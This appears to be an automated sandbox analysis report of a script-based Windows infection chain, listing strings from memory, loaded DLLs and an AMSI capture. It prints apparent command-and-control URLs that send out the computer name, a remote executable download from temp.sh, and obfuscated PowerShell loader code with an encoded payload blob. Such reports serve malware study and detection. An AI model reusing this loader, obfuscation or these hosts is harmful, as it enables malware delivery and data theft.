Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbZC source: powershell.exe, 00000002.00000002.1801780109.000001B34662A000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\System.pdbI source: powershell.exe, 00000002.00000002.1803138150.000001B346900000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\dll\System.pdb)f source: powershell.exe, 00000002.00000002.1803138150.000001B346900000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Windows\System.pdbpdbtem.pdb source: powershell.exe, 00000002.00000002.1803138150.000001B346900000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000002.00000002.1755950559.000001B32C35D000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: *n.pdb source: powershell.exe, 00000002.00000002.1756422832.000001B32DD91000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: m.pdb-g source: powershell.exe, 00000002.00000002.1803138150.000001B346900000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.pdb source: powershell.exe, 00000002.00000002.1755950559.000001B32C35D000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.1801780109.000001B34662A000.00000004.00000020.00020000.00000000.sdmp |
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$m1o7nzq3c4ray05/$lytnxfpbkhsum2w.php?id=$env:computername&key=$mceotxshykj&s=mints1 |
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://isyzgez.top |
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://isyzgez.top/1.php?s=mints1 |
Source: powershell.exe, 00000002.00000002.1756548460.000001B32F719000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mknjddllgakhaje.top |
Source: powershell.exe, 00000002.00000002.1756548460.000001B32F719000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mknjddllgakhaje.top/oie6bu9wr5htr.php?id=user-PC&key=43650517590&s=mints1 |
Source: powershell.exe, 00000002.00000002.1782155749.000001B33DEE2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: powershell.exe, 00000002.00000002.1756548460.000001B32DE71000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/ |
Source: powershell.exe, 00000002.00000002.1756548460.000001B32FBAF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://temp.sh |
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000002.00000002.1800811353.000001B346500000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.c9t |
Source: powershell.exe, 00000002.00000002.1756548460.000001B32DE71000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000002.00000002.1782155749.000001B33DEE2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000002.00000002.1782155749.000001B33DEE2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000002.00000002.1782155749.000001B33DEE2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000002.00000002.1782155749.000001B33DEE2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000002.00000002.1756548460.000001B32FB37000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://temp.sh |
Source: powershell.exe, 00000002.00000002.1756548460.000001B32F9E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1756548460.000001B32F9D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://temp.sh/bfseS/ruzxs.exe |
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll |
Source: C:\Windows\System32\wscript.exe | Section loaded: wbemcomn.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $eg6f5dmnzj0lbip.(([system.String]::new(@((8087-(67640680/(9188-(-4793+5547)))),(5997-5886),(10201-(4658+5431)),(-4512+(13879-(33091434/(8000-4421)))),(2038-1954),(909312/8192)))))( $4b7iqngl0fm3zt1 ) $eg6f5dmnzj0lbip.(([char[]]@((3528-3461),(8217-(59487624/7336)),(6501-(-2090+8480)),(4119-(13728-9724)),(-8905+9006)) -join ''))()$fu4ironpzhmjw2l.(([system.String]::new(@((216142/(8581160/(-3545+(53859400/(4076+4604))))),(499500/4625),(61827/557),(-2276+(-6344+8735)),(6194-(55757043/(66619280/7280)))))))()[byte[]] $f9woybdmlgz7nvr = $4b7iqngl0fm3zt1.((-join (@((664608/(847+(11904525/1685))),(-8954+9065),(503685/(14036-(14041-7754))),(-4671+4785),(639882/5613),(59267/(4002050/(1329+5221))),(568337/4697))| ForEach-Object { [char]$_ })))() $nha63b49uvzd1mt=$f9woybdmlgz7nvr return $nha63b49uvzd1mt}[System.Text.Encoding]::ascii.(([system.String]::new(@((124676/(-4260+(4704512/(-4489+(14854-9583))))),(410565/(-4545+(9172-(9630-9068)))),(303-187),(807258/(56887374/(11683-(29630886/(-613+(35910828/(-2159+8468))))))),(576636/(14293-(49173550/(20113575/(4938-(5916375/(3110+(256+(-295+2188))))))))),(556548/4882),(871080/8296),(797940/7254),(157178/1526)))))((3gb87m6det9axhcu5nfkjyiz02o 
"af9rbmhiZmQ2eJqsLRt/ORql+Ufyp1ZQXs9QhwWX3zsecG5QQe/Egmq74VgqPndhVT/1KqKGjoL5D/jfKdPkzExQ9FODdWwiEc6Y8juX2TBng5wLKa28GdcdGJrCnM4Hjf80YXddnJqVi4B/aKi+0bX92F4ORQgLS0tYgrd8iLtPhPR/0TutsVQYkJDTo+A/wIvdUaSdl5Z9nxhuyE6PQZYcXl2OwuvtraoT3xO5CSut5GtMjakUEbQMJSrsVRa1q2vVHSdHKFnlsFhyuYgauHeZOKcmJOQvwaC5sgqRmt6ITCCXSZmyC4/1C6icLmDqZB9vVRbyHY5BnsSKFIFG2g05G4PdyLPm/EpQ+fq5Mg6bhJG0bjc7JGLnuaFksovVOS4sEv1NIhkRiqv+W46sAN/7GVxNAoHJi5sUcUSu3b55J4HuzaqEA+Hb3aSlAJOq7FsNj/oL0deVjIkECGDYmdm21hBtlXFDW00ttYDhqfU9tJbJSBmEivL5DBBMBIj2nCg6BIY4AUtupxqdIBkxppQkXQ1p7mW+S1vSt3atW6D7w+/FnSI4897c3/DUlqTtScE7iczfArWTtPZbIQ4Jr9/HYTOcV0gLCMGejR7BAQTjxgAvHD5o8YTU+HhI4IGZYho2PZzOBYXDQEnr8ZAZDHMo/SbDjrLgg3F18dE+z9UjeBuED48hxkmux9xUGdVsnVhEVi3vQeogWdZT/sqF1LyMoFfCCcGkhV3uBU59hbhBsoyBl8HTr1aTDxoq8K6pm4LeBgMwjsGmvRWicwQEgTHllcgHAVn3b8GLG8GTcZWmO5lJH925Lc2mWz1mmk25Ptz+iz+ZAousIMT9Qdo1lyhPooRq3Zxqk0xROFFLKAj7/foRQF7so2rBe/49VLu4lMbcApYQGJVdX5B/kMtekgkdHLzOxIYgi5qNEQccg75tpY5MhYATlAwZkRTDEojLj99YkZyR4e2P4cAPGMJZ1vCF8gboNWyS3s07FEiyvoSuK9Yc4aJq1rWg4dnVe1t8IAy6J5rHrhZgD5sBXjHq2E0kQ3TtmADcTV+U5We/mOCf5/4KyL3FaXUchLDxOsdkmGyZPBWMMV/Pk9HXzVstmY/l0fN9pgrLFw6jLe8wOoKyExdjmkh+EaU5BOxN/zmi5kRYUymP+xuuuBaLz3BYrZP54XPJ61DHQcu93EfUDVPvQQDnP75v4qTTZDihDvJSX |